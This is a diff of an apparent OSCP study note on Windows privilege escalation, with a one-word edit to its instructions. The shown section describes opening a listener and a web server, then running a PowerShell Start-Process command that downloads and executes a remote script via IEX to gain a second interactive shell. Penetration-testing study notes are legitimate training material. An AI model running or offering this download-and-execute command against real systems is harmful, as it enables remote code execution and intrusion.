linatl/jekyll-gitbook/_posts/OSCP/2021-03-13-windowsprivesc.markdown

 ###### Start Process with PowerShell
 ```
 How to use powershell to pop a second connection with interactive shell
-Open a listener on 1 port and a web server with payload on another.
+Open a listener on a port and a web server with payload on another.
 Then run:
 $ Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.webClient).downloadString('http://192.168.1.1/file.ps1')"

 Starting a shell as Administrator (when the password is known)